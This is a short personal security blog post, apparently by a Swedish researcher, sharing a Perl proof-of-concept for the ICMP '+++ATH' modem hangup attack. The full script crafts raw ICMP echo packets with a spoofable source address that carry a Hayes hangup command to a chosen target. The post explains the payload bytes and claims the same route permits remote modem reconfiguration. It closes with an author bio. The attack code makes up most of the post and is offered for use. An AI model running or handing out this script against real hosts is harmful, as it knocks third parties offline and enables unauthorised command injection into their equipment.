ICMP Modem Hangup – DoS (RCE)
Yes, this might come as a spoiler, but me, Mathias and Kasper are currently researching in the Cellular area.
Enough of that at the moment.
Anyway, whilst we read through RFC's and wikipages, we stumbled upon this specific page containing:
"(...) this eventually (when modems began to be used to dial up to the Internet) led to a nasty denial-of-service attack involving an ICMP echo request ("ping") packet containing three pluses and ATH, the hangup command."
I've heard about this before, but i simply had to write a Proof of Concept, so here's a short Perl script for your enjoyment:
#!/usr/bin/perl
#By: Fredrik Nordberg Almroth
#URL: http://h.ackack.net/
use Net::RawIP;
my $saddr = shift || '1.3.3.7';
my $daddr = shift || '192.168.0.1';
$packet = new Net::RawIP ({icmp =>{}});
$packet->set({
ip => {
saddr => $saddr,
daddr => $daddr
},
icmp => {
type => 0x8,
code => 0x0,
data => "\x2B\x2B\x2B\x41\x54\x48\x0D\x0A"
}
});
print "[>] Sending 5 packets...\n";
$packet->send(0x1,0x5);
print "[~] Done!\n";
The hexadecimal gibberish "\x2B\x2B\x2B\x41\x54\x48\x0D\x0A" simply stands for: +++ATH (linebreak)
I believe you're not that familiar with Hayes AT-Command set,
so here's a short description of what it does.
The +++ changes the mode the modem is operating in from Data mode into Command mode which is pretty bad.
The AT part of the string says "Hey, i which to execute a command!", and the H stands for "Hang up".
I believe you see the DoS-scenario in this script.
However, it's possible to reconfigure the target modem completely.
So this isn't just a DoS, it's a whole command execution scenario!
Nice huh?
Now back to whatever i was doing,
Ciao!
Hey, I'm Fredrik. I'm from Sweden, born 1990, and I got a huge interest for information technology and information security. So far, I've been studying for three years at the Internation IT College of Sweden and one year at the Royal Institute of Technology (Kista, Sweden). I'm one of the Co-Founders of Detectify. I'm working closely together with the swedish firm Young & Skilled. ...Not to forget, I'm the previous founder of Arctic Security. If you wish to contact me, please email me at h@ackack.net or follow me on twitter @Almroot.